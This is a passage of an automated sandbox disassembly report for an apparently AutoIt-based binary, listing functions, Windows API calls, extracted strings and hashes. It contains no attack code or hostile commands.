                                      • Instruction ID: 706148e1707226d80a3ede39b9b6f130f9768d321c64c1ee60653f83326ab215
                                      • Opcode Fuzzy Hash: 8b4c827f27f5004bf26345838d09d7c8e9c405d67971867e434319e111ad0479
                                      • Instruction Fuzzy Hash: 3B515B71916208BFDF109FA8DD88EAE7B79EF08320F114615F915AB2A0E7759A40DF90
                                      Function 0099B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0099B7B0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0099B7C1
                                      • CharNextW.USER32(0000014E), ref: 0099B7F0
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0099B831
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0099B847
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0099B858
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0099B875
                                      • SetWindowTextW.USER32(?,0000014E), ref: 0099B8C7
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0099B8DD
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0099B90E
                                      • _memset.LIBCMT ref: 0099B933
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0099B97C
                                      • _memset.LIBCMT ref: 0099B9DB
                                      • SendMessageW.USER32 ref: 0099BA05
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0099BA5D
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0099BB0A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0099BB2C
                                      • GetMenuItemInfoW.USER32(?), ref: 0099BB76
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0099BBA3
                                      • DrawMenuBar.USER32(?), ref: 0099BBB2
                                      • SetWindowTextW.USER32(?,0000014E), ref: 0099BBDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: 118857916dde667a6a811ada956a3d70316e355a8eba294f9a15b13a76d451dd
                                      • Instruction ID: 518b88f912ab8e517078dbee28792cebd6ad28aef6b5ed5b75bb51882359f7d8
                                      • Opcode Fuzzy Hash: 118857916dde667a6a811ada956a3d70316e355a8eba294f9a15b13a76d451dd
                                      • Instruction Fuzzy Hash: D5E19071900218EBDF20DFA9DD84EEE7B7CEF45724F108159FA19AA190D7788A41DF60
                                      Function 0099764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 0099778A
                                      • GetDesktopWindow.USER32 ref: 0099779F
                                      • GetWindowRect.USER32(00000000), ref: 009977A6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00997808
                                      • DestroyWindow.USER32(?), ref: 00997834
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0099785D
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099787B
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009978A1
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 009978B6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009978C9
                                      • IsWindowVisible.USER32(?), ref: 009978E9
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00997904
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00997918
                                      • GetWindowRect.USER32(?,?), ref: 00997930
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00997956
                                      • GetMonitorInfoW.USER32 ref: 00997970
                                      • CopyRect.USER32(?,?), ref: 00997987
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 009979F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 845adcd56ce78237805fcc197e6233f4b0b7addd14aa51ab4eb3b12fa765ae1f
                                      • Instruction ID: a917c9f9b3748eafa439e040b38198580287e3b45f3a45fb27d0d0d0062a42fa
                                      • Opcode Fuzzy Hash: 845adcd56ce78237805fcc197e6233f4b0b7addd14aa51ab4eb3b12fa765ae1f
                                      • Instruction Fuzzy Hash: 06B17071618301AFDB04DFA9D985B5AFBE5FF88310F00891DF5999B291DB70E805CB91
                                      Function 0094A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0094A939
                                      • GetSystemMetrics.USER32(00000007), ref: 0094A941
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0094A96C
                                      • GetSystemMetrics.USER32(00000008), ref: 0094A974
                                      • GetSystemMetrics.USER32(00000004), ref: 0094A999
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0094A9B6
                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0094A9C6
                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0094A9F9
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0094AA0D
                                      • GetClientRect.USER32(00000000,000000FF), ref: 0094AA2B
                                      • GetStockObject.GDI32(00000011), ref: 0094AA47
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0094AA52
                                        • Part of subcall function 0094B63C: GetCursorPos.USER32(000000FF), ref: 0094B64F
                                        • Part of subcall function 0094B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      • SetTimer.USER32(00000000,00000000,00000028,0094AB87), ref: 0094AA79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: f0fd5ffd4329fa58713b3f2a9f0ce29c327f167cbe370113080335634e27da6b
                                      • Instruction ID: 075b82a7dd8261ec3c0cdeea6ecbd05eeaa7b72ecc5290883f43da6c1eed2757
                                      • Opcode Fuzzy Hash: f0fd5ffd4329fa58713b3f2a9f0ce29c327f167cbe370113080335634e27da6b
                                      • Instruction Fuzzy Hash: 28B18A71A4520ADFDB14DFA8CD45FAE7BB8FB48324F104229FA16E6290DB74D840DB91
                                      Function 00976CE9 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 178COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 2258151342-1459072770
                                      • Opcode ID: f35f50990fb65d4fdc274bfb51dbb8a9a0707f9802c130e48d707e20e4023c3c
                                      • Instruction ID: 054c18a2467734c46d49963ac09c15778abe179735ccae9e3f66063e279566c8
                                      • Opcode Fuzzy Hash: f35f50990fb65d4fdc274bfb51dbb8a9a0707f9802c130e48d707e20e4023c3c
                                      • Instruction Fuzzy Hash: 4341D172A00201BBEB11AB65CC47FBF776CEFC5714F044069FD05A2182FB759A05A7A2
                                      Function 00932EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Foreground
                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                      • API String ID: 62970417-1919597938
                                      • Opcode ID: fd8b2fcbd5c0508e6e72b4cbe1257d676491a159dd9b9eff6fce19e2e40b5db1
                                      • Instruction ID: fa8134d0ab91be3bde1c64169a9de9e23fedbab00235c0f59908ae1e5952cae0
                                      • Opcode Fuzzy Hash: fd8b2fcbd5c0508e6e72b4cbe1257d676491a159dd9b9eff6fce19e2e40b5db1
                                      • Instruction Fuzzy Hash: 13D1C730508742ABCB18EF64C481BAABBB4FF96344F104A1DF496575A1DB30E99ACFD1
                                      Function 00993639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00993735
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,009CDC00,00000000,?,00000000,?,?), ref: 009937A3
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009937EB
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00993874
                                      • RegCloseKey.ADVAPI32(?), ref: 00993B94
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00993BA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 0338d5bfc7e786d0c3311f9927eaa6a4b9403e4f4ceded0c88f1b710ceb9e02a
                                      • Instruction ID: aef7c311688e415ea8165e16b245d0c8b867fb37b713125035db86ed2a5776f4
                                      • Opcode Fuzzy Hash: 0338d5bfc7e786d0c3311f9927eaa6a4b9403e4f4ceded0c88f1b710ceb9e02a
                                      • Instruction Fuzzy Hash: AD0239756046019FCB14EF19C995B2AB7E9FF89720F04895DF98A9B3A1DB30ED01CB81
                                      Function 00996BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00996C56
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00996D16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: 3baaea21ef8d230cc071399c3cbcf03726eb9007b6f8b36229c34b609deefe25
                                      • Instruction ID: 4b682762f0306512f2ee8171fcc969535e4a363af700950062232a9f3d38e23d
                                      • Opcode Fuzzy Hash: 3baaea21ef8d230cc071399c3cbcf03726eb9007b6f8b36229c34b609deefe25
                                      • Instruction Fuzzy Hash: 48A15D706043459BCB14EF28C991F7AB3A5BF84314F14496DB8A6AB3D2EB34ED05CB51
                                      Function 0096CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0096CF91
                                      • __swprintf.LIBCMT ref: 0096D032
                                      • _wcscmp.LIBCMT ref: 0096D045
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0096D09A
                                      • _wcscmp.LIBCMT ref: 0096D0D6
                                      • GetClassNameW.USER32(?,?,00000400), ref: 0096D10D
                                      • GetDlgCtrlID.USER32(?), ref: 0096D15F
                                      • GetWindowRect.USER32(?,?), ref: 0096D195
                                      • GetParent.USER32(?), ref: 0096D1B3
                                      • ScreenToClient.USER32(00000000), ref: 0096D1BA
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0096D234
                                      • _wcscmp.LIBCMT ref: 0096D248
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0096D26E
                                      • _wcscmp.LIBCMT ref: 0096D282
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                      • String ID: %s%u
                                      • API String ID: 3119225716-679674701
                                      • Opcode ID: b1f0e9fd0f2b07e1e8909050b7b49f3bb0a201892f85a0d11df7cfd7b93ddb27
                                      • Instruction ID: 1698914177d6fa032a690505f999e1cb136afca7e3dd1ba514b7b810cc53f47d
                                      • Opcode Fuzzy Hash: b1f0e9fd0f2b07e1e8909050b7b49f3bb0a201892f85a0d11df7cfd7b93ddb27
                                      • Instruction Fuzzy Hash: 5EA1C171A09306AFD715DF64C894FAAB7ACFF44354F008619F9B9D2190EB30EA45CB91
                                      Function 0096D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0096D8EB
                                      • _wcscmp.LIBCMT ref: 0096D8FC
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0096D924
                                      • CharUpperBuffW.USER32(?,00000000), ref: 0096D941
                                      • _wcscmp.LIBCMT ref: 0096D95F
                                      • _wcsstr.LIBCMT ref: 0096D970
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0096D9A8
                                      • _wcscmp.LIBCMT ref: 0096D9B8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0096D9DF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0096DA28
                                      • _wcscmp.LIBCMT ref: 0096DA38
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0096DA60
                                      • GetWindowRect.USER32(00000004,?), ref: 0096DAC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: 134278f05b7a686746e03ef9987af12821d11d36008afcbbe5a246d591091ed8
                                      • Instruction ID: 1a730723dafbd176da94e78cdcaf29013bac00320afe243104b7e7deec4c2c5d
                                      • Opcode Fuzzy Hash: 134278f05b7a686746e03ef9987af12821d11d36008afcbbe5a246d591091ed8
                                      • Instruction Fuzzy Hash: 1881D2316093059BDB05CF60C985FAA7BECFF84314F04846AFD999A096EB30DD45CBA1
                                      Function 0096D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 2d28f05ba26b28403c248173744416247fea51710d2f2db5ad5d10e777f82093
                                      • Instruction ID: c9260bbdfebcb91754556a35f02b35799efe9540768b4ea4ac5cc351bca341ef
                                      • Opcode Fuzzy Hash: 2d28f05ba26b28403c248173744416247fea51710d2f2db5ad5d10e777f82093
                                      • Instruction Fuzzy Hash: B231BE71A44249AADB15EF62DE43FEDB3BC9FA1744F300069F851B20D1EB51AF08CA52
                                      Function 0096EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 0096EAB0
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0096EAC2
                                      • SetWindowTextW.USER32(?,?), ref: 0096EAD9
                                      • GetDlgItem.USER32(?,000003EA), ref: 0096EAEE
                                      • SetWindowTextW.USER32(00000000,?), ref: 0096EAF4
                                      • GetDlgItem.USER32(?,000003E9), ref: 0096EB04
                                      • SetWindowTextW.USER32(00000000,?), ref: 0096EB0A
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0096EB2B
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0096EB45
                                      • GetWindowRect.USER32(?,?), ref: 0096EB4E
                                      • SetWindowTextW.USER32(?,?), ref: 0096EBB9
                                      • GetDesktopWindow.USER32 ref: 0096EBBF
                                      • GetWindowRect.USER32(00000000), ref: 0096EBC6
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0096EC12
                                      • GetClientRect.USER32(?,?), ref: 0096EC1F
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0096EC44
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0096EC6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: ee5d2902d51990238620e2ba315e6af5fe627267a0eb5012fd1f971f273bed30
                                      • Instruction ID: e06f2ea48da3ba19751740ac7cee858779ad8eadecaff1730520e517a2c1e3e1
                                      • Opcode Fuzzy Hash: ee5d2902d51990238620e2ba315e6af5fe627267a0eb5012fd1f971f273bed30
                                      • Instruction Fuzzy Hash: 67514C75900709EFDB20DFA9CE89F6EBBF9FF04714F004A28E586A25A0D774A944DB50
                                      Function 009879B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 009879C6
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 009879D1
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 009879DC
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 009879E7
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 009879F2
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 009879FD
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00987A08
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00987A13
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00987A1E
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00987A29
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00987A34
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00987A3F
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00987A4A
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00987A55
